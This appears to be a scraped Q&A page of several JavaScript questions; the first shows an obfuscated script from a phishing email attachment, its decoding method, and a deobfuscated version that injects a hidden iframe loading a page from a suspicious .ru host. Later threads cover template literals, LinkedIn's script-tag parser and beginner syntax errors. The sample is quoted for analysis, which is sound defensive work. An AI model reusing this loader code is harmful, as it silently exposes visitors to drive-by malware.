Deobfuscate/Parse String - javascript

I received the following in an email attachment today stating that it was a confirmation for a ticket that I supposedly bought. Please help me understand how one would go about deconstructing this code...
<script>
c = 2;
i = c - 2;
if (window.document) try {
new c.prototype
} catch (hgberger) {
f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
md = 'a';
e = window["e" + "val"];
w = f;
s = [];
r = String;
for (; 613 != i; i += 1) {
j = i;
s += r.fromCharCode(38 + 1 * w[j]);
}
e(s);
}</script>

Unobfuscated:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

I took the code you posted, and pasted it verbatim into http://jsfiddle.net. The only thing I changed (and I recommend this) was changing the call to e(s) to alert(s). That way, your browser won't try to execute the embedded code, but just display it for you.
You'll see some dodgy stuff about iframes and dnvfodooshdkfhha.ru, which seems spammy.

It looks like that string is a list of character codes separated by 'n' s. If you run the code with the last line replaced with 'alert(s)' instead of e(s) you will see the obfuscated code that your malware is trying to 'eval'

Related

Is it possible to construct a string in Javascript which has 'variables' built in?

I am working on a PDF with some scripting, and I am applying code to fields using the console and some simple loops to save on repeated efforts. In some cases, I am applying a custom calculation script to a field where one integer needs to change from one field to the next. If all the scripts were the same, I would run this in the debugger console:
var s = "if(this.getField(\"Span A\").value >= 60){\n\
event.value = Math.round(((this.getField(\"Span A\").value*41500 - 1674500)/233));\n\
}else{\n\
event.value = Math.round((this.getField(\"Span A\").value*3500/60));\n\
}";
for (var i = 0; i < this.numFields; i++){
var f = this.getField(getNthFieldName(i));
if(f.name.match(/quant a/i) != null){
var n = f.name.match(/\d/g);
f.setAction("Calculate", s);
}
}
I have many 'Quant' fields, and each group (A, B, etc) will have a similar calculation. The fields are name "Quant A1", "Quant A2" etc. Quant A1 needs to calculate with the input from Span A1.
In the above script, it would be really cool if I could have a variable within the script string that I can pass a value (n) to be plugged in to the string, essentially the same way a function call works.
Is this possible?
Here is my fantasy version of what I imagine it could look like (this is just to further explain my intent; I don't think this would actually work this way):
var s(x) = "if(this.getField(\"Span A\""x").value >= 60){\n\
event.value = Math.round(((this.getField(\"Span A\""x").value*41500 - 1674500)/233));\n\
}else{\n\
event.value = Math.round((this.getField(\"Span A\""x").value*3500/60));\n\
}";
for (var i = 0; i < this.numFields; i++){
var f = this.getField(getNthFieldName(i));
if(f.name.match(/quant a/i) != null){
var n = f.name.match(/\d/g);
f.setAction("Calculate", s(n));
}
}
You could use string litterals if you're useing ES6 and higher.
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals?retiredLocale=nl
const greetings = "I'm a variable!";
let string = `Hi! this is a variable: ${greetings}`;
console.log(string);
Otherwise concatenate it with the + operator.
If I understand correctly your question. I think you want to use template literals.
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
Use backticks instead of " or ' to insert your variables inside a string.
const a ='Cheese'
const b= 'is Delicious'
${a} ${b} will output 'Cheese is Delicious'

Why is the script tag for LinkedIn auth not valid JavaScript?

The LinkedIn guide for setting up auth with the Javascript SDK shows a code sample but it's very confusing as to what the author actually means.
<script type="text/javascript" src="//platform.linkedin.com/in.js">
api_key: [API_KEY]
onLoad: [ONLOAD]
authorize: [AUTHORIZE]
lang: [LANG_LOCALE]
</script>
It's not valid JS, there's no commas, and quotes are omitted. Also, the example shows brackets but these have to be omitted or an error will be thrown. A real-world example would alleviate the confusion, but, of course, none is provided.
Here's a valid example but using a made-up API key (the API key is the same thing as the client ID – the guide doesn't bother to explain that)
<script type="text/javascript" src="//platform.linkedin.com/in.js">
api_key: 93h7nnksxj3ccd
authorize: true
lang: en_US
</script>
As you can see with this other SO question, I'm not the only one who is confused, this guy thought the same thing I did, which is that quotes would be needed.
How does this code actually work? Is this considered valid syntax for a script tag which has the type text/javascript?
[edit] Re: possible duplicate, seems this is not. See the selected answer. [/edit]
The external script is reading and parsing the script tag's innerHTML directly. This is covered by this blog article by Roger Hu:
http://hustoknow.blogspot.com/2012/12/how-linkedins-js-api-implements.html
The article examines LinkedIn's JavaScript and identifies the parser used:
http://platform.linkedin.com/in.js
Basically the code below appears to extract out the innerHTML and then set the variables r and K to be the key/value pairs. White spaces are removed with the replace() function.
Here is a brief description, followed by longer excerpts:
Data is extracted raw from the innerHTML:
l = f.innerHTML.replace(A, n)
A regular expression for each line is defined:
g = (/^[\s]*(.*?)[\s]*:[\s]*(.*)[\s]*$/),
It is used per line, setting r to the key and and K to the value.
W = s.match(g);
r = W[1].replace(A, n);
K = W[2].replace(A, n)
If there is no match, it provides the following error:
script tag contents must be key/value pairs separated by a colon.
Larger excerpt:
for (U = 0, q = t.length; U < q; U++) {
var f = t[U];
if (!m.test(f.src)) {
continue
}
if (b.test(f.src)) {
c = true
}
try {
l = f.innerHTML.replace(A, n)
} catch (z) {
try {
l = f.text.replace(A, n)
} catch (y) {}
}
}
l = l.replace(J, "$1").replace(A, n).replace(F, n);
ab = C.test(l.replace(j, n));
for (var U = 0, T = l.split(k), q = T.length; U < q; U++) {
var s = T[U];
if (!s || s.replace(j, n).length <= 0) {
continue
}
try {
W = s.match(g);
r = W[1].replace(A, n);
K = W[2].replace(A, n)
} catch (Y) {
if (!ab) {
console.warn("script tag contents must be key/value pairs separated by a colon. Source: " + Y)
}
continue
}
N(r, K)
}
The set of regular expressions is defined at the top of the script:
var S = {
"bootstrapInit": +new Date()
},
p = document,
m = (/^https?:\/\/.*?linkedin.*?\/in\.js.*?$/),
b = (/async=true/),
D = (/^https:\/\//),
J = (/\/\*((?:.|[\s])*?)\*\//m),
F = (/\r/g),
j = (/[\s]/g),
g = (/^[\s]*(.*?)[\s]*:[\s]*(.*)[\s]*$/),
x = (/_([a-z])/gi),
A = (/^[\s]+|[\s]+$/g),
u = (/^[a-z]{2}(_)[A-Z]{2}$/),
C = (/suppress(Warnings|_warnings):true/gi),
d = (/^api(Key|_key)$/gi),

Error: unexpected token ';' at the end of a javascript statement

Just a side note before you try to help: I am a complete newbie. Try to keep things simple ;)
I am trying to code a way to store var values between webpages in HTML. So far I have not been very successful. The problem I am having at the moment is the error 'unexpected token, ';'' (when I paste it into the console on 'Ctrl+Shft+J'
var cookieString = document.cookie;
var savedStats = 0;
var stats = 0;
var fsStat = 0;
var psStat = 0;
var testStat = 0;
function getStats() {
function splitCookieString() {
return savedStats = cookieString.split(',');
}
return stats = [savedstats[0], savedStats[savedstats.length - 1];
return fsStat += stats[0];
return psStat += stats[1];
return testStat = 'Hello World!';
}
}
and it points to the end of the line:
return stats = [savedstats[0], savedStats[savedstats.length -1];
Please help me! Also while I'm here, the Function 'getStats()' has a wierd thing going on where it makes me put two '}' to end it.
The code you posted shows some problems around the understanding of:
The return keyword (structured programming)
The assignment operator (=) (imperative programming)
I strongly recommend to develop some understanding of these concepts.

Google Apps Script random string generating

i am new to Google apps script, i want to create string of random characters in the code given below in variable body2.
function myfunction() {
var files = DriveApp.getFiles();
while (files.hasNext(`enter code here`)) {
Logger.log(files.next().getName());
}
var recipient = Session.getActiveUser().getEmail();
var subject = 'A list of files in your Google Drive';
var body1 = Logger.getLog();
var body2;
for(var i=0;i<6;i++)
{
body2[i]=BigNumber.tostring("Math.floor(Math.random()*11)");
}
body=body1+body2;
MailApp.sendEmail(recipient, subject, body);
};
but when i run this function, it says "TypeError: Cannot find function tostring in object 0. (line 12, file "Code") " i can't understand how to solve this error?
Why we have to multiply random by 11 , can it be multiplied with any integer number?
what if i want that string in only capital letters.!
Some other question
1) i don't have enough knowledge of JavaScript, is it good to learn GAS directly?
2) i can't find proper written material or documentation for GAS , the material available at Google's official site is seems to be updating time by time , what to do then ? any link to material would help me .!
I guess I just figured
function randomStr(m) {
var m = m || 15; s = '', r = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
for (var i=0; i < m; i++) { s += r.charAt(Math.floor(Math.random()*r.length)); }
return s;
};
Hope someone finds it helpful.
As for a random string use this its better:
Math.random().toString(36). 36 is the base thus will use letters and numbers in the string.
As for gas documentation, the official page is pretty complete. It changes because it constantly improves and adds new services.
I have this charIdGeneration() in my GAS library
function charIdGenerator()
{
var charId ="";
for (var i = 1; i < 10 ; i++)
{
charId += String.fromCharCode(97 + Math.random()*10);
}
//Logger.log(charId)
return charId;
}

javascript timed function - expected identifier

I am having a problem with a simple script that is supposed to update a page with some values(user input) that are turned from monthly to yearly (the numbers go into numeric fields created by confirmIT)
<script>
function update() {
for (var i = 0; i < 9; i++) {
var ans = parseInt(document.getElementById("bq10a_" + i).value, 10);
if (!isNaN(ans)) {
var new = ans * 12;
document.getElementById("bq10a_" + i + "calc").value = new;
}
}
}
return;
}
setInterval("update()", 1000);
</script>
this yields an Expected identifier error on line
var new = ans*12;
and i would appreciate any help on how to solve it
The word new is a reserved word in JavaScript and cannot be used as the name of a variable.
The error means that the parser expected an "identifier", which is to say that it expected to see a valid identifier.
Change the name of the variable and things should improve. In the code you've posted I think there's a { } nesting problem; there appears to be one too many before the return of the function.
edit — also as jbabey notes in a comment, your setInterval() call should be
setInterval(update, 1000);
It's not a good idea, generally, to pass strings to setInterval(), despite the advice of thousands of mouldy old instructional websites.
Word "new" -- is special in javascript language:
line is incorrect:
var new = ans*12;
try this:
var newvalue = ans*12;
More information on:
http://javascript.about.com/library/blreserved.htm
http://www.ecma-international.org/publications/standards/Ecma-262.htm

Categories